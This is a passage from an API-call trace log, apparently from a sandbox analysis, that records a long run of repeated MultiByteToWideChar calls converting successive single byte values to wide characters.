dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="|←K☈`ﶸ)ნK|") returned 1 [0089.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="}←K☈`ﶸ)ნK}") returned 1 [0089.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="~←K☈`ﶸ)ნK~") returned 1 [0089.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="\x7f←K☈`ﶸ)ნK\x7f") returned 1 [0089.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="€←K☈`ﶸ)ნK\x80") returned 1 [0089.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="\x81←K☈`ﶸ)ნK\x81") returned 1 [0089.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="‚←K☈`ﶸ)ნK\x82") returned 1 [0089.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="ƒ←K☈`ﶸ)ნK\x83") returned 1 [0089.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="„←K☈`ﶸ)ნK\x84") returned 1 [0089.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="…←K☈`ﶸ)ნK…") returned 1 [0089.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="†←K☈`ﶸ)ნK\x86") returned 1 [0089.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="‡←K☈`ﶸ)ნK\x87") returned 1 [0089.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="ˆ←K☈`ﶸ)ნK\x88") returned 1 [0089.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="‰←K☈`ﶸ)ნK\x89") returned 1 [0089.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="Š←K☈`ﶸ)ნK\x8a") returned 1 [0089.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="‹←K☈`ﶸ)ნK\x8b") returned 1 [0089.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="Œ←K☈`ﶸ)ნK\x8c") returned 1 [0089.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="\x8d←K☈`ﶸ)ნK\x8d") returned 1 [0089.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="Ž←K☈`ﶸ)ნK\x8e") returned 1 [0089.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="\x8f←K☈`ﶸ)ნK\x8f") returned 1 [0089.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="\x90←K☈`ﶸ)ნK\x90") returned 1 [0089.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="‘←K☈`ﶸ)ნK\x91") returned 1 [0089.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="’←K☈`ﶸ)ნK\x92") returned 1 [0089.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="“←K☈`ﶸ)ნK\x93") returned 1 [0089.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="”←K☈`ﶸ)ნK\x94") returned 1 [0089.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="•←K☈`ﶸ)ნK\x95") returned 1 [0089.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="–←K☈`ﶸ)ნK\x96") returned 1 [0089.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="—←K☈`ﶸ)ნK\x97") returned 1 [0089.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="˜←K☈`ﶸ)ნK\x98") returned 1 [0089.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="™←K☈`ﶸ)ნK\x99") returned 1 [0089.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="š←K☈`ﶸ)ნK\x9a") returned 1 [0089.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="›←K☈`ﶸ)ნK\x9b") returned 1 [0089.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="œ←K☈`ﶸ)ნK\x9c") returned 1 [0089.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="\x9d←K☈`ﶸ)ნK\x9d") returned 1 [0089.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="ž←K☈`ﶸ)ნK\x9e") returned 1 [0089.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="Ÿ←K☈`ﶸ)ნK\x9f") returned 1 [0089.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr=" ←K☈`ﶸ)ნK ") returned 1 [0089.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="¡←K☈`ﶸ)ნK¡") returned 1 [0089.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="¢←K☈`ﶸ)ნK¢") returned 1 [0089.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="£←K☈`ﶸ)ნK£") returned 1 [0089.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="¤←K☈`ﶸ)ნK¤") returned 1 [0089.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="¥←K☈`ﶸ)ნK¥") returned 1 [0089.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="¦←K☈`ﶸ)ნK¦") returned 1 [0089.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="§←K☈`ﶸ)ნK§") returned 1 [0089.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="¨←K☈`ﶸ)ნK¨") returned 1 [0089.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="©←K☈`ﶸ)ნK©") returned 1 [0089.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="ª←K☈`ﶸ)ნKª") returned 1 [0089.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="«←K☈`ﶸ)ნK«") returned 1 [0089.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="¬←K☈`ﶸ)ნK¬") returned 1 [0089.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="­←K☈`ﶸ)ნK­") returned 1 [0089.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="®←K☈`ﶸ)ნK®") returned 1 [0089.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="¯←K☈`ﶸ)ნK¯") returned 1 [0089.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="°←K☈`ﶸ)ნK°") returned 1 [0089.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="±←K☈`ﶸ)ნK±") returned 1 [0089.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="²←K☈`ﶸ)ნK²") returned 1 [0089.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="³←K☈`ﶸ)ნK³") returned 1 [0089.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="´←K☈`ﶸ)ნK´") returned 1 [0089.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="µ←K☈`ﶸ)ნKµ") returned 1 [0089.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="¶←K☈`ﶸ)ნK¶") returned 1 [0089.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="·←K☈`ﶸ)ნK·") returned 1 [0089.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="¸←K☈`ﶸ)ნK¸") returned 1 [0089.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="¹←K☈`ﶸ)ნK¹") returned 1 [0089.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="º←K☈`ﶸ)ნKº") returned 1 [0089.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="»←K☈`ﶸ)ნK»") returned 1 [0089.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="¼←K☈`ﶸ)ნK¼") returned 1 [0089.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="½←K☈`ﶸ)ნK½") returned 1 [0089.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="¾←K☈`ﶸ)ნK¾") returned 1 [0089.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="¿←K☈`ﶸ)ნK¿") returned 1 [0089.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="À←K☈`ﶸ)ნKÀ") returned 1 [0089.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="Á←K☈`ﶸ)ნKÁ") returned 1 [0089.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="Â←K☈`ﶸ)ნKÂ") returned 1 [0089.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="Ã←K☈`ﶸ)ნKÃ") returned 1 [0089.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="Ä←K☈`ﶸ)ნKÄ") returned 1 [0089.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="Å←K☈`ﶸ)ნKÅ") returned 1 [0089.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="Æ←K☈`ﶸ)ნKÆ") returned 1 [0089.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="Ç←K☈`ﶸ)ნKÇ") returned 1 [0089.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="È←K☈`ﶸ)ნKÈ") returned 1 [0089.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="É←K☈`ﶸ)ნKÉ") returned 1 [0089.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="Ê←K☈`ﶸ)ნKÊ") returned 1 [0089.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="Ë←K☈`ﶸ)ნKË") returned 1 [0089.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="Ì←K☈`ﶸ)ნKÌ") returned 1 [0089.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="Í←K☈`ﶸ)ნKÍ") returned 1 [0089.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="Î←K☈`ﶸ)ნKÎ") returned 1 [0089.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="Ï←K☈`ﶸ)ნKÏ") returned 1 [0089.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="Ð←K☈`ﶸ)ნKÐ") returned 1 [0089.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="Ñ←K☈`ﶸ)ნKÑ") returned 1 [0089.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="Ò←K☈`ﶸ)ნKÒ") returned 1 [0089.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="Ó←K☈`ﶸ)ნKÓ") returned 1 [0089.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="Ô←K☈`ﶸ)ნKÔ") returned 1 [0089.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="Õ←K☈`ﶸ)ნKÕ") returned 1 [0089.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="Ö←K☈`ﶸ)ნKÖ") returned 1 [0089.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="×←K☈`ﶸ)ნK×") returned 1 [0089.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="Ø←K☈`ﶸ)ნKØ") returned 1 [0089.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="Ù←K☈`ﶸ)ნKÙ") returned 1 [0089.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="Ú←K☈`ﶸ)ნKÚ") returned 1 [0089.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="Û←K☈`ﶸ)ნKÛ") returned 1 [0089.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="Ü←K☈`ﶸ)ნKÜ") returned 1 [0089.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="Ý←K☈`ﶸ)ნKÝ") returned 1 [0089.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="Þ←K☈`ﶸ)ნKÞ") returned 1 [0089.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="ß←K☈`ﶸ)ნKß") returned 1 [0089.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="à←K☈`ﶸ)ნKà") returned 1 [0089.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="á←K☈`ﶸ)ნKá") returned 1 [0089.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="â←K☈`ﶸ)ნKâ") returned 1 [0089.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="ã←K☈`ﶸ)ნKã") returned 1 [0089.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="ä←K☈`ﶸ)ნKä") returned 1 [0089.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="å←K☈`ﶸ)ნKå") returned 1 [0089.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="æ←K☈`ﶸ)ნKæ") returned 1 [0089.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="ç←K☈`ﶸ)ნKç") returned 1 [0089.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="è←K☈`ﶸ)ნKè") returned 1 [0089.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="é←K☈`ﶸ)ნKé") returned 1 [0089.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="ê←K☈`ﶸ)ნKê") returned 1 [0089.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="ë←K☈`ﶸ)ნKë") returned 1 [0089.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="ì←K☈`ﶸ)ნKì") returned 1 [0089.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="í←K☈`ﶸ)ნKí") returned 1 [0089.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="î←K☈`ﶸ)ნKî") returned 1 [0089.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="ï←K☈`ﶸ)ნKï") returned 1 [0089.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="ð←K☈`ﶸ)ნKð") returned 1 [0089.716] MultiByteToWideChar (in: 